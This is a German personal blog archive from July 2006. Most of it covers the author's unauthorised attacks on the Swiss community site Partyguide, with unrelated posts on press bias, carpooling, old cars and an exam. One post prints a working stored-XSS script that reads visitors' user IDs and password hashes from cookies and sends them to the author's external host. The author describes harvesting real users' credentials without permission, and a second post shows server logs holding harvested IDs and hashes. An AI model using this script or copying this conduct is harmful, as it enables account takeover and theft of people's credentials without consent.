Archiv Juli 2006

Sonntag, 9. Juli 2006

Der vierte Partyguide-Hack

Wie bereits in meinem gestrigen Artikel Partyguide Strikes Back angetönt habe ich eine weitere (äusserst peinliche) Schwachstelle auf der Community-Web-Site mit der „schweizweit längsten Verweildauer“ gefunden.

Obwohl Partyguide auch dieses Mal seinen Benutzern nichts über die Sicherheitslücke und die mögliche Kompromittierung ihrer Passwörter erzählt hat (bisher jedenfalls), äusserte man indirekt Kenntnis über die Attacke, als man meine Passwort-Datenbank mit einer DDoS-ähnlichen Attacke zuspammen wollte. Das ist natürlich auch eine Art, auf solche Hacks zu reagieren – und eine sehr professionelle dazu:

Deshalb entschieden wir uns, dein Skript ein paar Tausend mal mit gefakten Daten aufzurufen. […] Ob die ganze Aktion erfolgreich verlaufen ist, können wir natürlich nicht sagen.

Quelle: Kommentar von Oli (seines Zeichen Partyguide-Partisan und einer der Argonauten)

Zwei Hinweise von meiner Seite – den Rest kann man sich selber zusammenreimen:

  • Ich verwende INSERT IGNORE in meinem MySQL-Query. Primary Key ist die Benutzer-ID.
  • Meine MySQL-Datenbanken werden jede Nacht mit mysqlhotcopy gebackupt.

Bloatware

Als diesmalige Schwachstelle empfahl sich die kürzlich eingeführte Blog-Funktion (Ein einig Volk von Bloggern (Partyguide 1, eBay 1) und Partyguide und seine Blogs).

Mit dem „Wir-auch“-Ansatz hat man sich aber ein Ei gelegt. Die Parallelen zu Microsoft erstaunen den Kenner kaum: Deren Produkte zeichnen sich als Bloatware aus – bei jedem neuen Release stehen unzählige neue Funktionen im Vordergrund, der Qualitätssicherung und Sicherheit zollt man – wenn überhaupt – nur beiläufig Respekt.

Microsoft hat mit dem Wurm-Debakeln ab 2001 ernsthafte Konsequenzen aus diesem fragwürdigen Verhalten gezogen; Service Pack 2 für Windows XP war das markanteste Anzeichen für den eingetretenen Sinneswandel. Seit diesem glorreichen Tag heisst es auch in Redmond: Security first. Wann folgt auch Partyguide endlich diesem Motto?

Partyguide war sich für diesen Schritt bisher aber zu Schade. Dabei haben den Betreibern über 200’000 Benutzer persönliche Angaben wie Vornamen, Nachnamen, Adresse, Geburtsdatum, Telefonnummer, E-Mail-Adresse anvertraut …

Man verfolgt bei der Bekämpfung von Sicherheitslücken den erfolgsversprechenden Ansatz, potentielle Hacker mundtot zu machen. Anstelle das man die Probleme ein für allemal beseitigt (mein Vorschlag: Code-Audit – aber nicht durch die längst disqualifizierten stümperhaften Programmierer, sondern durch Profis), köpft man lieber den Überbringer der schlechten Nachricht.

Funktionsweise des Exploits

Die Leser werden sich nun fragen, wie dieser vierte Hack (Nummer drei war bisher der spektakulärste – sowohl im Umfang wie auch bezüglich Peinlichkeit) zu stande kam …

Nach den erstaunlichen Cookie-Tricklein, auf die mich ein anonymer Tippgeber aufmerksam machte, kam die XSS-Attacke (ohne Exploit) von Dritten, um danach mir erneut die Chance zu geben, mittels SQL-Injection die Datenbank auf im Klartext gespeicherte Passwörter „abzugrasen“.

Nummer Vier wiederum kam durch einen Initialhinweis durch Dritte zu Stande – dieses Mal handelt es sich um eine ganz klassische eine JavaScript-Injection. Alte Schule, nichts bahnbrechends Neues, seit Jahren bekannt. Wohl nur nicht auf der Argo (paradox: Argo bedeutet auf Griechisch „die Schnelle“) …

Ziel des Angriffs war die bereits erwähnte Blog-Funktion. Diese wurde eingeführt, weil ein findiger Kopf auf dem Schiffchen die glänzende Idee gehabt hatte, auf den momentanen Blog-Hype aufzuspringen.

Ganz nebenbei: Ehrlich gesagt würde ich lieber ein Corporate Blog begrüssen – Titel „Jason und die Party-Argonauten“, in dem wir offizielle Statements zu aktuellen Problemen/Neuerungen nachlesen können. Dauert wohl noch etwas länger.

Und noch einmal nebenbei: Man kann sich überhaupt fragen, ob man dieser Funktion überhaupt den Beinamen „Blog“ geben darf – oder nicht eher: Aufgebohrte Kommentarfunktion? Egal. Der registrierte User kann also der ganzen Welt mitteilen, was Belangloses gerade in seinem Leben abläuft. Und das natürlich nicht nur in Form von Plain-Text, sondern auch mit Textauszeichnunge (Schriften, Farben, Textgrössen, Textauszeichnugne) – realisiert durch HTML-Code. Spätestens hier sollten die Alarmglocken eines sicherheitsbewussten Entwicklers schrillen.

Nun war es so, dass man sich für einen WYSIWYG-HTML-Editor entschied. Die Wahl der Entwickler fiel auf FCKeditor, den ich selbst in einigen Web-Projekten auch einsetze. Daran ist nichts auszusetzen. Was ich erst später entdeckte: Lustigerweise wird aber dieser Editor in Safari, meinem Browser der Wahl, nicht geladen (FCKeditor wäre eigentlich Safari-kompatibel). Ich konnte Artikel also in Plain-Text eingeben, war mir diesem Unterscheid gegenüber den anderen Usern vorerst aber nicht bewusst.

Der Hinweis, der den Ansatz für diesen Exploit lieferte, wurde mir durch einen anonymen Tippgeber zugestellt. Die Person hatte entdeckt, dass man in das Titelfeld JavaScript-Befehle eingeben konnte, die nicht ausgefiltert wurden (bspw. mit der netten PHP-Funktion htmlentities()). Mein Ehrgeiz war auf alle Fälle geweckt.

Nach einer kurzen Überprüfung des Sachverhaltes begann ich, den JavaScript-Exploit zu coden. Ziel: Durch den zweiten Hack angeregt die Cookie-Daten des Lesers des Blogs auszulesen und diese an ein Script auf einem meiner Server weiterzuleiten.

Die Limitation der Zeichen im Titelfeld war sehr mühsam und ich brachte den gewünschten Code nicht im verfügbaren Platz unter. Ich wollte bereits aufgeben, als ich als letzter, verzweifelter Versuch den Code in die textarea, das eigentliche Feld für den Inhalt des Artikels, eingab. Ich konnte mir zu diesem Zeitpunkt überhaupt nicht vorstellen, dass jemand so blöd wäre, JavaScript-Befehle in diesem Feld ungefiltert entgegenzunehmen, in der DB abzuspeichern und danach wieder ohne Behandlung kritischer HTML-Befehle auszugeben. Denkste!

Folgender Code wurde ohne zu murren gefressen:

<script>
 d=document;c=d.cookie;
 
 exp=/c_id=([0-9]{1,6})/;id=exp.exec(c); 
 exp=/c_psw=([a-zA-Z0-9]{32})/;pw=exp.exec(c);
 
 if(id[1] && pw[1]) {
  d.write('<iframe width=\'0\' height=\'0\' src=\'http://p.mad4you.homeip.net/b.gif?i='+id[1]+'&p='+pw[1]+'\'></iframe>');
 }
 </script>

und füllte fortan meine Datenbank.

Soweit ich es erkennen kann, übernimmt eine Funktion des FCKeditors das Ausfiltern unerlaubter Tags. Da diese Applikation aber Client-seitig läuft, ist es lächerlich, sich ausschliesslich darauf zu verlassen! Man tat es – wohl aus einer Kurzschlussreaktion heraus – trotzdem.

Schade nur, dass die Frequenz der Übermittlungen deutlich abnahm, sobald mein Artikel auf Grund der Veröffentlichungszeit die Titelseite verliess. Ich griff zu dem umständlichen Trick, den Artikel von Zeit zu Zeit neu zu speichern, denn dann wurde das Veröffentlichungsdatum automatisch angepasst und der Artikel fand wieder den Weg auf die Titelseite.

Die Zielpersonen für diesen Angriff waren zweifach eingeschränkt: Einerseits mussten die Personen die Autologin-Funktion aktiviert haben, denn sonst wird keine User-ID und der Passwort-MD5-Hash (die Verwendung eines Hashes wurde durch mich angeregt – vorher Plain-Text) im Cookie gespeichert. Andererseits mussten die Personen auch aktiv die Blog-Seite ansurfen. Alles in allem ein sehr unergiebiger Prozess – aber dennoch spassig (halt, nein, es handelt sich um eine sehr ernste Sache, mögen PG-Jünger rufen – Gegenfrage: Wenn es so ernst ist, wieso sind die „ernsten“ Daten so lächerlich gesichert?!).

Findings

Nicht, dass diese Regeln neu wären, doch bei den Partyguide-Entwicklern ist die Meldung wohl noch nicht bis zum Grosshirn durchgekommen:

  • Traue nie GPC-Daten! (GPC = GET/POST/Cookie)
  • Validiere Eingaben niemals Client-seitig, sondern auf dem Server
  • Teste Scripts
  • Teste Scripts nicht mit denjenigen Daten, die du als Programmierer erwartest
  • Teste Web-Sites auf den wichtigsten Browsern (MSIE, Mozilla/Firefox, Opera, Safari/KHTML)

Evil

Bin ich nun ein Böser, weil ich a) aktiv oder durch Hinweise nach Exploits suche und b) dann auch hinterhältig Passwort-Daten sammle? Und all dies, ohne Partyguide innert Minuten nach der Entdeckung der Sicherheit benachrichtige? Oli findet es:

Jedoch mussten wir wieder einmal mehr feststellen, mit welchen bösartigen Absichten du pg gegenüber stehst. […] Im letzten Monat bist Du aber definitiv zu weit gegangen. Deine Böswilligkeit kommt immer mehr zum Vorschein.

May I introduce: The Antichrist himself! Von Nostradamus seit Jahrhunderten vorausgesagt, nun endlich wandelt er im Körper von Mario Aeby auf Gottes Erde …

Kollege Burgdorfer amüsierte sich ab dieser Aussage: Wenn das Böse sei, was ich bisher gemacht hätte, hat Oli ein komisches Verständnis von Bösheiten …

Spass bei Seite: Sicherlich ist mein Vorgehen nicht dasjenige eines professionellen Security-Experten. Aber für mich waren die letzten zwei Hacks eben auch ein Test, der aufzeigen sollte, ob die Betreiber der Community-Site ihre Applikation entsprechend aufmerksam überwachen. Beim letzten Hack dauerte die Reaktionszeit satte 7 Tage, obwohl eine Betrachtung der Log-Daten schon am ersten Tag meiner Attacke auffällige Angaben enthielt.

Der vierte Hack wurde nur entdeckt, weil Partyguide von einem Dritten darauf aufmerksam gemacht wurde. Man stelle sich vor, ich hätte bis in den Herbst hinein weiter auf Partyguide „gebloggt“ …

Auch der CEO tappt in die Falle

Ist er nicht süss: Schon am zweiten Tag meiner Sammelaktion fand sich in der Datenbank einen Eintrag mit der Benutzer-ID ‚1‘ …

Tags: ,
Labels: Allgemein

Keine Kommentare | neuen Kommentar verfassen

Freitag, 7. Juli 2006

Partyguide Strikes Back


Partyguide Strikes Back I
Originally uploaded by emeidi.

Partyguide Strikes Back II
Originally uploaded by emeidi.

Gestern Donnerstag, kurz nach Mitternacht, muss es Jason und den Argonauten endgültig den Nuggi rausgejagt haben. Wenige Tage vor dem siebenjährigen Geburtstag der (in den letzten sechs Monaten wohl am häufigsten gehacktenTM) schweizerischen Party-Community blies man nun zum Gegenschlag gegen den so verhassten think eMeidi.

Die Verantwortlichen entdeckten – ob durch Hinweis eines Dritten Mitstreiters sei dahingestellt – meine Arbeiten am vierten Partyguide-Hack (JavaScript-Injection, später dazu mehr – dank an Anonymous für den ursprünglichen Tipp).

Nach stundenlangen Beratungen im Tipi des Häuptling Jasons kamen die geistreichen Argonauten zum Schluss, mit geballter Feuerkraft zurückzuschiessen. Für was verfügt man denn über genug Bandbreite und eine Vielzahl an Servern (zum Teil gar durch Gönner mitfinanziert)?

So wurde mein Debian-Server kurz nach 00:00 Uhr Ziel einer stümperhaften DoS-Attacke, die erst heute Nachmittag kurz vor 16:00 Uhr abbrach. Wie man es den beiden cacti-Graphen ansieht, äusserten sich die geballten Aufrufe meines Scriptleins, das Usernamen und Passwort-Hashes (aus dem Cookie) in Empfang nahm, sowohl in einem konstanten ein- und ausgehenden Traffic auf eth0 sowie einer stark erhöhten Load Average auf meiner schmalbrüstigen Pentium III-CPU (600MHz).

Fazit

Ein access.log, das fünfmal so schwer wiegt wie sonst:

ALPHA:/var/log/apache2# ls -l
total 44808
-rw-r--r-- 1 root adm  29612337 2006-07-08 01:01 access.log
-rw-r--r-- 1 root adm   5789490 2006-07-02 06:24 access.log.1

… und uns auch noch etwas über die Technik von Partyguide erzählt:

217.150.245.77 - - [07/Jul/2006:15:50:27 +0200] "GET /b.gif?i=84455&p=ab5c62bbb11b644fdcecd91e89acd768 HTTP/1.1" 302 - "-" "curl/7.12.1 (i686-pc-linux-gnu) libcurl/7.12.1 OpenSSL/0.9.6m zlib/1.2.2"

… sowie auch die IP des mutmasslichen „Täters“ freigibt:

84.72.129.186 - - [07/Jul/2006:00:06:25 +0200] "GET /b.gif?i=100&p=1234 HTTP/1.1" 302 20 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"

217.150.245.77 - - [07/Jul/2006:00:29:04 +0200] "GET /b.gif?i=196828 HTTP/1.1" 302 700 "-" "curl/7.12.1 (i686-pc-linux-gnu) libcurl/7.12.1 OpenSSL/0.9.6m zlib/1.2.2"

84.72.129.186 - - [07/Jul/2006:00:30:05 +0200] "GET /b.gif HTTP/1.1" 302 224 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"

84.72.129.186 - - [07/Jul/2006:00:30:24 +0200] "GET /b.gif?i=196828 HTTP/1.1" 302 218 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"

Eine MySQL-Tabelle mit knapp 110’000 Records, die allesamt vom Partyguide-Server aus kamen:

mysql> SELECT COUNT( * )  FROM  `xss`  WHERE ip =  '217.150.245.77';
+------------+
| COUNT( * ) |
+------------+
|     109342 |
+------------+
1 row in set (0.47 sec)

Und nicht zuletzt ein Beweis, wie robust Debian Linux mit Apache 2.0.55, PHP 4.4.2 und MySQL 4.1.15 ist.

Fehler von meiner Seite

Das nächste Mal schalte ich E_ALL in solch sensitiven Verzeichnissen wieder aus:

[Fri Jul 07 00:29:04 2006] [error] [client 217.150.245.77] PHP Notice:  Undefined index:  p in /var/www/pg-search/xss.php on line 12

Leider Gottes ein zu guter Ansatzpunkt für potentielle PG-Hacker …

Zu guter Letzt noch dies …

Es tut mir wirklich leid, das sagen zu müssen: Anstelle eure Energie an einem kleinen Fisch wie mir zu verschwenden, unterzieht ihr all eure PHP-Scripts einmal einem richtig gründlichen Security-Audit.

Tags:
Labels: Linux

Keine Kommentare | neuen Kommentar verfassen

Freitag, 7. Juli 2006

SMS, die Geschichte schrieben – Part 1

Da serious preparation 4da replacement ***** [engl. Himmelsrichtung] is matcht. I hope desteny is on my side! U dir sieche keni blogs u keni kommentare! Hei mer üs verstange! Gruzz

Quelle: SMS von ***** an Mario, 24. Juni 2006, 15:42 Uhr

(***** wandelt übrigens immer noch auf Gotthelfs (Tochter) Spuren. Wieso bringt der Ötzel, ne Gotthelf ins Spiel? Ganz einfach: Gotthelf war Pfarrer im Emmental …)

Hinweis: Wer von all dem hier keinen Zentimeter versteht – das ist normal. Es handelt sich hierbei um einen Artikel, der für den engen Kollegenkreis gedacht ist.

Tags:
Labels: Uncategorized

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 5. Juli 2006

Mythos "linke Presse"

In den letzten Monaten vernahm man von Seiten der JSVP immer wieder den Vorwurf, die Presselandschaft Schweiz sei stockschwul stocklinks. Als studierender Medienwissenschafter im Nebenfach darf natürlich mein Senf zu diesem Gericht nicht fehlen.

Schwammig zum Ersten

Bereits bei dem aus zwei Wörtern bestehenden Kampfbegriff sei eine Frage erlaubt: Was zum Teufel heisst denn jetzt „links“? Schwach links-liberal? Gar sozialistisch? Kommunistisch?

Antwort könnte eine Doku-Sendung geben. Per Zufall zeigte uns Prof. Roger Blum gerade in dieser Zeit in der Vorlesung „Einführung in die politische Kommunikation“ eine Doku zum 50-Jahre-Jubiläum des Schweizer Fernsehens mit dem sinnigen Titel: „Vom Schmuddelkind zum Leitmedium“.

Irgendwo im Film fällt die Aussage (sinngemäss):

„Für die SVP ist alles links, was nicht ihrer eigenen Meinung entspricht“

Bezeichnet man mit „links“ also gar nicht konkret zu bewertende Aussagen von Presseerzeugnissen, sondern primär einmal alles, was einer bestimmten Partei nicht in den Kram passt? Eine Kritik also, weil in den Medien plötzlich nicht mehr das einfache und propagandistisch effiziente Schwarz-/Weissbild wiedergegeben wird, sondern ein grauer Teppich?

Die Angelegenheit wird jedenfalls zunehmends schwammiger – aber zeigt auch auf, von wem primär die Kritik ausgeht: Von der Schweizerischen Volkspartei. Ich habe mir zwar jetzt nicht die Mühe gemacht, nach Voten von Anhängern anderer Parteien zu suchen, habe aber das Gefühl, dass dies eines der vielen SVP-Selbstbemitleidungs-Themen ist, die periodisch herumgeistern.

Punkt 1: Macht man den Vorwurf, ist „links“ hieb und stichfest zu definieren. Meint man damit die Nachrichtenauswahl (welche Themen bringt eine Redaktion überhaupt in die Zeitung)? Oder meint man die Meinungsäusserung von Journalisten in Kolumnen und Leitartikeln, bspw. vor Wahlen und Abstimmungen?

Schwammig zum Zweiten

Nachdem als der Terminus „links“ für Verwirrung sorgt, folgt zugleich die nächste Unklarheit: Was meint man mit Presse? Sind das Presseerzeugnisse (also einzelne Blätter wie – bspw. – die NZZ)? Oder noch mehr generalisierend ganze Medienhäuser? Oder meint man doch nicht eher – eine Ebene tiefer als die Zeitung – linke Journalisten?

Die Parteizeitungen sind in der zweiten Hälfte des letzten Jahrhunderts zunehmends von der Bildfläche verschwunden. Neben der (unbestritten) linke WoZ oder die liberale NZZ oder die rechtsnationale Schweizerzeit gibt es kaum eine Zeitung, die sich explizit zu einer Partei oder (etwas vager: einer politischen Strömung) zugehörig fühlt. Hier vollzieht sich eine Entwicklung, die die zwei angelsächsischen Länder USA und Grossbritannien bereits im 19. Jahrhundert abgeschlossen hatten.

Ich bezweifle, dass Medienhäuser freude daran hätten, als „links“ bezeichnet zu werden – schliesslich brächte sie das in Konflikt mit dem liberalen Credo des freien Marktes und des Kapitalismus (die Linke ist bekanntermassen ja bereit, diese Grundsätze zum Wohle der Schwachen mal mehr, mal weniger zu dehnen).

Punkt 2: Meint man mit Presse einzelne Tageszeitungen, wohlwissend, dass es sich bei dieser Generalisierung um ein schwer fassbares Gebilde handelt, das sich aus Individuen (Medienschaffende) mit unterschiedlichen Meinungen und Auffassungen zusammensetzt? Man vergesse nicht: Redaktionen sind nicht gleichgeschaltet.

Auswirkungen

Selbst wenn die Presselandschaft Schweiz „linksdominiert“ wäre – welche Auswirkungen hat das?

Die SVP beklagt sich (in einem mir gerade präsenten Fall) darüber, dass ihre Aktion mit „trojanischem Pferd“ (nie gehört – eben wohl gerade wegen der Nichtbeachtung durch die Medien *grins*) in keiner Zeitung erwähnt wurde. Medienschaffende wählen aber veröffentlichswerte Nachrichten nicht primär nach ihrer Gesinnung aus (Motto der Verschwörungstheoretiker: „die linken News in die Zeitung, die rechten in den Rundablage …“) sondern viel rationaler nach den sog. Nachrichtenwerten oder -faktoren. Gerade wenn es sich um künstlich Ereignisse dreht, die rein nur stattfinden, um Medienpräsenz zu erlangen, darf keinem Redaktor der Vorwurf gemacht werden, das Thema willentlich weggelassen zu haben. Auch hier regiert – in übertragenem Sinne – der Markt: Die interessantesten, spannendsten, farbigsten Nachrichten werden gedruckt. Etwas, was den Rechten ja durchaus gefallen müsste. Das spornt an und führt unter dem Strich für alle Marktteilnehmern zu positiven Auswirkungen – wie öde wäre eine Quote an vermeintlich „linken“ und „rechten“ Artikeln?

In der Medienlandschaft besteht in heutiger Zeit sowieso die Tendenz, nicht einfach zu verlautbaren, was der Pressesprecher der SVP gesagt hat, sondern diese Aussagen in den Gesamtzusammenhang zu setzen und dem Leser eine Interpretation zu liefern (Stichwort: Komplexitätsreduktion). Zum guten Ton gehört es im Journalismus hierbei, beide Seiten zu Wort kommen zu lassen und Argumente beider Seiten abzudrucken.

Selbstverständlich schimmert aber spätestens bei Kommentaren und Leitartikeln dann die Gesinnung wieder durch. Diese sind nach aller Regel der Kunst dementsprechend gekennzeichnet (im Bund beispielsweise mit kursivem Titel).

Gerade bei Abstimmung verlangt es der Leser meiner Meinng nach, eine Wahlempfehlung präsentiert zu bekommen. Und zwar nicht ein simples „Ja“/“Nein“, sondern eine erläuterte Entscheidfindung mit guten, nachvollziehbaren Argumenten. Jeder Medienwissenschafter weiss zudem: Es ist schier unmöglich, Einstellungen eines sog. Rezipienten durch Medienaussagen um 180 Grad zu drehen. Die Verstärkung einer bestehenden Meinung dagegen liegt im Bereich des Möglichen.

Ein kurzes Beispiel mit Blick auf das Asylgesetz: Selbst wenn die Linken einen millionenteuren Wahlkampf führen würden – der Xenophoe wird deswegen garantiert immer noch Ja stimmen. Lassen rechte Kreise vor der Abstimmung aber verlauten, dass es mit den Stimmenzahlen knapp werden könnte, kann dies ein Grund sein, mehr Personen (mit rechter Gesinnung) zum Gang ins Wahllokal zu mobiliseren …

Wieso so viele linke Journalisten?

Die Rechte muss sich aber noch eine weiterführende, fast philosophische Frage gefallen lassen: Gehen wir von einem liberalen Modell aus (dass in mir einmal solche Gedankengänge stattfinden – ein Novum!), regelt sich der „Medienmarkt“ selber. Eine „linke Presse“ wäre also das Resultat marktwirtschaftlicher Kräfte. Ein Markt, auf dem es anscheinend für rechte Presse-Erzeugnisse kaum Überlebenschancen gibt. Zumindest ist mir keine auf SVP-Linie polternde Tageszeitung bekannt. Wieso? Geht man von den Wählerzahlen aus, denkt ein Viertel der Wähler in ähnlichen Bahnen wie die „Volkspartei“ – handelt es sich dabei allesamt um Analphabeten? Oder stehen wir schon im Endstadium der Verweigerungshaltung gegenüber der „linken Presse“? Oh graus: Lesen SVP-Wähler nicht überproportional den (heute linken) Blick? Wieso tut man sich das an? Gerade den Rechten sollte es doch finanziell kaum schwer fallen, eine rechte Tageszeitung (welch ein Wortspiel!) zu lancieren …

Anderer Ansatz: Produzieren die Rechten einfach zu wenige fähige Journalisten? Wieso? Studieren weniger Personen aus diesen Kreisen? Oder absolviert man als richtiger Rechter wirtschaftsnahe Studiengänge?

Labels: Medien, Politik

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 5. Juli 2006

Tempo 80? Nein, Fahrgemeinschaften!

Kollege Sommer wird beim Lesen des Titels zwar einer akut allergischen Reaktion erliegen, doch ich meine es ernst:

Am Dienstagmorgen durfte ich zwecks Prüfung seit langem wieder einmal so einen richtigen Stau bei der Ausfahrt Forsthaus geniessen. Kein Wunder: Kurz vor Acht ist bei den Eingängen zur Stadt die Hölle los. Dichtgereiht steht Personenwagen hinter Personenwagen. Und immer bietet sich dasselbe Bild: In Reih und Glied tuckern überdimensionierte Kombis, in der genau eine Person sitzt. Schon rein nur von der Platzverschwendung her liesse sich der Stau gut und gerne halbieren, wäre jedermann mit einem Smart unterwegs.

Und doch: Vereinzelt erblickt das geübte Auge – einem Lichtblick gleich – zwei oder ganz ausgefallen: drei Personen, die den heute so vergötterten Individualismus über den Haufen geworfen und sich zu einer Fahrgemeinschaft zusammengeschlossen haben. Schon erstaunlich: Der Rest steht irgendwie dennoch genau zur gleichen Zeit individuell gemeinsam im Stau …

Für mich ist es unlogisch, wieso Öko-Verbände nun Tempo 80 fordern, um den alljährlichen Schadstoffemissionen im Hochsommer Herr zu werden. Da müssen viel drastischere und effektivere Massnahmen her.

Ich fordere deshalb:

  • Freie Fahrt für Fahrgemeinschaften! Sind Fahrzeuge mit mehr als einer (oder zwei?) Person beladen, gibt es freie Fahrt mitten in die Stadt. Wer dagegen unbedingt den Individualisten heraushängen will, darf dies gerne tun. Einerseits werden die Individualisten aber auf eine eigene, halt etwas überfüllte Spur verfrachtet, anderseits ….
  • Roadpricing Wer es nicht lassen kann und zwingend per Auto in die Stadt brennt, bezahlt halt eine Einlassgebühr. Moderne Wegelagerei des Staates, sozusagen. Individualisten werden hier deutlich stärker zur Kasse gebeten, vor allem wenn sie mit überdimensionierten Fahrzeugen unterwegs sind. Natürlich gelten Ausnahmen für beruflich genutzte Fahrzeuge (den Maler kann man ja nicht für seine Farbkessel im Fonds bestrafen).

Tags:
Labels: Uncategorized

Keine Kommentare | neuen Kommentar verfassen

Dienstag, 4. Juli 2006

Lisis grosser Bruder

Da schlägt doch das grüne Herz höher:

MotorTrend.com discovered Ben Johnson who traded his Pontiac GTO for a Honda Accord back in 1977 and never looked back. […]

The amazing part is that Johnson is still driving his Accord after 30 years and almost 300,000 miles.

Quelle: Oldest Accord ever still running strong – UPDATE (Via: Digg)

Auch wenn dieses Gefährt bezüglich Benzin-Verbrauch und Schadstoffausstoss wohl mit den heutigen SUVs 3-Liter-Lupos kaum mithalten mag – die Ressourcen für die Herstellung eines Gefährts müssen eben auch in die Rechnung miteinbezogen werden (im Fachjargon: Vollkosten-Rechnung). Und dann schlägt der grüne Daumen deutlich Richtung Accord aus.

Was die können …

Und wer denkt, dass man bis nach Übersee schweifen muss, um solch ökologisch verantwortungsvolle Personen und ihre Gefährte zu bestaunen, irrt gewaltig: R.I.P. Lisi II oder warum 300’000 genug sind! (Lisi II – eines der wenigen Schweizer Autos, das auf einer eigenen, professionell (*höhö*) gestalteten Web-Site gehuldigt wird). Ich werde Kollege Sommer für seine ökologischen Verdienste als Ehrenmitglied der Grünen Partei wie auch des VCS vorschlagen. Auf dass er an das Heck seines neuen „Beamers“ voller Stolz den VCS-Kleber pappen kann.

1/2 Million Kilometer

Übrigens: Dies ist alles nichts gegen Kollege Sedlaceks Audi A6, der es über eine halbe Million Kilometer brachte. Voraussetzung: Regelmässiger Service.

Gedankenspiele

Es wäre aber illusorisch zu glauben, Kollege Sommer würde sich nun in das zweckrationale Lager begeben und den Träger des Gelben Engels des ADAC (und Nachfolger des ebenso famosen Toyota Starlets) als neues Fortbewegungsmittel erküren.

Auch Sprit- und Versicherungs-Überlegungen (mit Blick auf das Kässeli) dürften nicht den Ausschlag geben – nicht zuletzt, weil ja sonst die Totschläger-Ausrede „Mammon“ wegfallen würde …

…verlängerung?

Sollte sich Rud schämen, mit einem Smart aufzukreuzen: 1) Es gibt ja immer noch meinen altehrwürdigen (und seit kurzem mit Herz getaggten) Pöscho. Das ist kaum zu unterbieten.

Und zweitens: Eine spontan ausgeführte empirische Untersuchung mit anschliessender Interpolation zeigt nebenbei, dass das Fahrzeug eines Besitzers nicht mit dessen „Jagderfolg“ korreliert ist.

Zu guter Letzt …

Übrigens: Auch für Computer gilt dasselbe:

Die Herstellung eines PC verschlingt Unmengen an Energie und riesige Rohstoffmengen. So gehen Studien von mindestens 16 bis 19 Tonnen an Ressourcenverbrauch pro PC aus. Das sind fast zwei Drittel soviel wie für einen Mittelklasse-PKW (ohne Elektronik) benötigt werden, und letzterer wird wesentlich länger genutzt. Der größte Teil dieser Ressourcen wird verbraucht, um die nötige Energie für die Produktion bereitzustellen.

Tags:
Labels: Uncategorized

Keine Kommentare | neuen Kommentar verfassen

Dienstag, 4. Juli 2006

Prüfung / Klausur ‚politische Kommunikation‘ Blum – Fragen

So, mit dem heutigen Tag beginnt auch für mich die „vorlesungsfreie Zeit“ (Professoren hüten sich wohlweislich, diese dreieinhalb Monate bis Beginn des Wintersemesters als „Ferien“ zu titulieren). Heute gegen 9 Uhr habe ich den Klausur-/Prüfungsbogen über die Vorlesung „Einführung in die politische Kommunikation“ abgegeben.

Wenn alles gut läuft und ich eine genügende Note hinkriege, werde ich nie mehr eine Prüfung über eine Vorlesung ablegen müssen. Langsam, aber sicher, nähert sich mein Studium dem glorreichen Ende. Vorher sind aber noch eine Seminararbeit, zwei Proseminararbeiten (Geschichte) sowie zwei Seminararbeiten und eine Facharbeit (Medienwissenschaften) zu präsentieren. Dann vielleicht doch lieber noch ein, zwei Klausuren?

Neuerung: Nur noch Multiple Choice!

Wohl auf Grund der Beschränkung der Mittel durch die Universitätsleitung sah sich das ikmb gezwungen, die Prüfung komplett aus Multiple Choice-Fragen zu gestalten. Blum-Prüfungen enthielten in früheren Jahren zur Einstimmung sonst immer nur zehn solcher Frage, gefolgt von kleinen Textantworten und als Abschluss noch ein grösseres Aufsätzchen.

Diese Mal gab es also nur noch Ankreuz-Fragen, und zwar musste man Aussagen mit ‚Wahr‘ oder ‚Falsch‘ bewerten. Insgesamt gab es 79 Fragen à 1 Punkt (sprich: Total 79 Punkte), wobei die Prüfung aufgeteilt war in 10 Fragen zur Einleitung (ganzes Stoffgebiet), 55 Fragen à ca. 11 Abschnitte zu bestimmten Teilschwerpunkten und schlussendlich noch 14 Fragen zur „Theorie“.

Was mir noch in Erinnerung ist (Achtung: nachfolgend keine Feststellung, sondern Behauptungen, die mit ‚Wahr’/’Falsch‘ beantwortet werden müssen):

  • Die Schweigespirale ist empirisch belegt
  • Sind folgenden fünf Veranstaltungen egalitär-diskursiv mit öffentlicher Repräsentation?
    • Bauern-Demo auf Bundesplatz
    • Bundesratssitzung
    • Senatssitzung USA
    • Albisgüetli-Tagung der SVP
    • Landsgemeinde in Glarus
  • Wahl- und Abstimmungskampf der SVP (30er Jahre, negative campaining)
  • Regierungskommunikation bei Abstimmungen (herrschaftsfreier Diskurs nach Habermas …, gilt das Öffentlichkeitsprinzip in der Bundesverwaltung (gut geraten!), nirgends auf der Welt sind Regierungssitzungen öffentlich)
  • Untersuchung über politische Diskussionen in Deutschland (Spezifisch: Wo wird diskutiert? mit Nachbar, auf der Arbeit, diskutieren Ossis mehr als Wessis, wird gar nicht diskutiert)
  • Politischer Bias von Journalisten (Fernsehen selektiert nach Nachrichtenwert, Selektion der Nachrichten nach pol. Einstellung? Kommentare nach pol. Einstellung? Eine Mehrzahl der amerikanischen Journalisten würde nie im Leben in die Politik wechseln wollen)
  • Amerikanisierung in der CH (Parteien, Medien, …)
  • Policy beschreibt Prozesse der Politik
  • Opinion Leader sind wichtigstes Element des Two-Step-Flow of Communication
  • Es gab bisher drei Strukturwandel der Öffentlichkeit
  • Landsgemeinden gibt es in Glarus, Appenzell I., Obwalden, Graubünden.
  • Unterstützung der Verlage durch Bund – Thema ging unter, nur darüber berichtet, was Bundesrat meint (Instrumentalisierung schwacher Medien, „super-system“, Ressourcenmangel, Nachrichtenfaktor Bundesrat grösser als Verlage/Studienautor, …)

Gefehlt haben:

  • Definition pol. Kommunikation
  • öffentliche Meinung

Diskrepanz

Die Prüfung verlangte ein deutlich tieferes Fachwissen als man als Besucher der Vorlesung erwartet hätte. Obwohl ich das Gefühl hatte, mich gut auf die Klausur vorbereitet zu haben, war die Beantwortung einer Vielzahl der Fragen eine Lotterie. Das Script jedenfalls enthält nicht alle Antworten auf die gestellten Fragen.

Aber eben: Die Notenskala ist ja flexibel, hoffen wir also, dass Mitstudenten ebenso Mühe hatten.

Labels: Politik

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 2. Juli 2006

Bald auch bei uns?

